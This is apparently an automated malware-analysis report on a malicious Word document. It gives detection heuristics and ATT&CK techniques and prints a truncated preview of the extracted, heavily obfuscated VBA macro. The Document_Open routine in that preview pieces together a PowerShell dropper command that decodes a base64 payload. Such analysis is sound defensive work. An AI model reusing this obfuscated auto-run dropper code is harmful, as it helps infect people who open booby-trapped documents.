MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers a Shell() call, which executes a PowerShell command. This command is designed to download and execute a second-stage payload from a remote URL, indicating a dropper functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6605641-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6605641-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18838 bytes |
SHA-256: 3e86b4701daade618c0120fa9639a2c2810e5a1863b8fb7afb623b3f9fbaa8c4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QdNinbYszdDwW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
cIBoT = (hKacLF * kUiZX - IXaHV - TNnHBN + 43548 - NKJqF + (40498 + rOUEuA))
DrvWsO = (CAjCAh * DZPprI - KrTCiQ - FDbla + 67803 - PFqiwS + (15351 + KDUzz))
hPhjS = (JOXcpf * OdWUAj - LGmvA - XcPuPu + 72252 - TMmZfm + (76379 + hojTRZ))
psJHq = (dmidbh * cMvtBv - juUtX - ZwLhXw + 72965 - EXliz + (85991 + ArBLGk))
sPRfMvYlw ("" + EIkDsAcUJwlzz + ZwJnTYKsp + kiFAIwwZFUp + oQaASzhG + fdLDz + ZQdZTuXPkOBia + dvkYpJPB)
iDTiQr = (XXIGU * uJAVt - rEapvi - zfliJ + 28950 - skrEjT + (44001 + HDtzIi))
pnVQL = (HOYAFs * lswrtU - SvpaO - zXwvZ + 54380 - Qwrnz + (30281 + ccjjO))
End Sub
Attribute VB_Name = "WKuHPOjwtwvBB"
Function kiFAIwwZFUp()
On Error Resume Next
dXksk = MUizc / NViBPB + JszrQi + SMqzq + KHpUi * uDjED
frdsiC = 25407 + aadfU * 20432 * rzdkIP - GjNWr - vaowu / 70237 * KoTLu * 56519 / jjLpK * 26022 / 23516 * 23396 * aSoQIk
IKGPzm = 64831 + jHXCjS * 80241 * NnZUYM - ujrNdF - uZroD / 69555 * ljudE * 51126 / oJCHd * 18242 / 4972 * 41489 * cHvjL
RvkOnfzwVV = "p" + EfPNzLrPFI + iqUlYGZ + "owe" + AwRYOPh + MFbWZYK + "rsh" + wLsXBaSjlnJIE + TEjwpjvKH + "el" + WbIRvbjPbdMcuq + duzvHzIDVoMC + "l " + BlVFErX + ibpipGbpHjASP + "( " + oWTFvHOd + cbHpmOKJDO + "NeW" + VSwuzFTGk + OQhYSYkUzhG + "-o" + TzUUqIMunWB + BHJKBnrA + "b" + EqslSuVkPF + zkzQcYjatjX + "jEc" + cKnjSViabP + WtzRllvqaIYLkL + "T " + SiYTjOqki + jnAYUWTFijIHub + "I" + UlcvHCLIwrJOID + hpMDakEoQFom + "o.c" + drQSVwFIpj + bdMFzaQZaFPPV + "oM" + niBOYwaORzqh + YAjaiJacLIN + "P"
vXcBwl = SdnSD + 86431 * OuIHt / uBFjon + GKTtAC / iqovt
LuNNW = IMhDBU + 43970 * tStMJK / HKtRB + WYFMNz / jHrVRz
YAzdPkHiY = "re" + PsjfZkYvjjl + kTwVLmn + "sSi" + nWYGmaYuMrPiu + WFlzKciLHfWY + "O" + ljGBYFJGTzzWoX + ZpSKwGAoROJ + "N.D" + aPCzzaKIc + bPloCnoGRfFhFO + "eF" + jSkJvwqshuX + kTzSWijUMldaCt + "LAT" + iwlzudpsNz + tGHQzJjMHP + "est"
PLUhHi = FFWzwm + 82239 * GdFEW / JbFdM + tMXOTN / kjJIk
XTWHJ = GGZjCK + 24035 * FjODvF / shIjkj + TzUUZ / hqEwU
wFvmzodwKU = "R" + noLJBifzuFpa + mOaYzAncOhk + "E" + OfQiNiMFszXjC + DPfzICDqX + "AM" + VzKadYElQUiW + uZtRDpvaUYwCl + "([S" + KpsniNNuSTwfQ + ZtEHOcKZTGnvim + "ySt" + mQvFfliwijf + FKiQVzFwiZNAQY + "EM" + SiIqsMOVDTnKH + zjbOvJiJmWcI + "." + FPNBGMwWkFsw + CMvqArQQ + "io." + lhnZWUPE + wEaIBRiazVWzz + "M" + ZbmHzQoa + YYZAPpoZV + "E" + mmpjIqRSnlhWSw + zXXKdXsdsJZ + "m" + iaiDInowXqa + PiqCHEVM + "OR" + zDUPuMq + hmFLDSJIF + "YST"
PwHjZz = 94174 / TTOmVS + (kKvtp / wBwuzH + 8293 / znaEi)
jznWH = 26851 / qCVOTr + (hzoYu / jrJoUJ + 36976 / jzvQjQ)
ROLjuN = 40918 / vhRQc + (GkXfK / wJlas + 85887 / Wjnin)
sRllkiCzR = "re" + wkMubdACNh + PqCDYXTsHcl + "a" + rwUIzdh + JALkjnwGXsARG + "m]" + kJQPmLTwXsk + uOEKdXhBrno + "[CO" + BFsnkkTqXpNRLf + nrzIQMJ + "N" + niwdsVckpKOGk + LqWZrsSsqzEvoX + "v" + vEwzBUMfTkhVV + CjzwaqkwwUqHdo + "E" + MJVSBnKwqdqFG + XODBMpaFwLIwdK + "RT" + ruzULzJuOYBF + iqnWTtZmNwmDXG + "]:"
hnitzK = 18320 / mXFJmn + (UIwjRK / rTJEh + 97821 / HbDBZq)
LFDOLtSq = ":" + AUjzkvo + ZJRvZZbfbvLjud + "Fr" + iwBINwas + MkNVvftFHoQMCd + "Om" + PSQUFqWpGzmHmc + qbMqSFAfpp + "ba" + rRuYiThIck + OXPwsmTfFr + "S" + QjbJRkiQVAw + NZSubwF + "e6"
Ozbuf = 68835 / tlGZaW + (FzIqNV / LIqVF + 74727 / ichsK)
buqDnD = 42433 / QAvTHz + (YqrGbA / ZariN + 1161 / duQrZH)
DJWhdFUD = "4S" + fjVibjGYnaNspR + tLCCpkZZwsPI + "tRi" + PRJLTbViujFj + ruQMtwwzCZFuHv + "NG" + RzzGKwjiwHOL + zFidiCbDP + "('" + POkFZTZBLSIk + vLmOljnijcAL + "V" + fHOhYYuh + YnoKFAoUns + "Z" + poiruhiIFNqMV + aLWqNMO + "Bd" + uddjnfYkZnSZDh + DqSKzboBz + "a8" + QCaiawjw + vUaoFni + "I" + XitdKWvfzSp + ZWIizJraWlMI + "wF" + sVsoFOSqiW + IfThdbcJv + "Ib/" + WnZvDAtjUCA + GijNTirl + "Si"
ALGpHk = 62054 / aopWBj + (PplqE / IcKaz + 85172 / qMLuM)
XSVsozrriEq = "8K" + wLlvoEZOTkdC + sGv
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.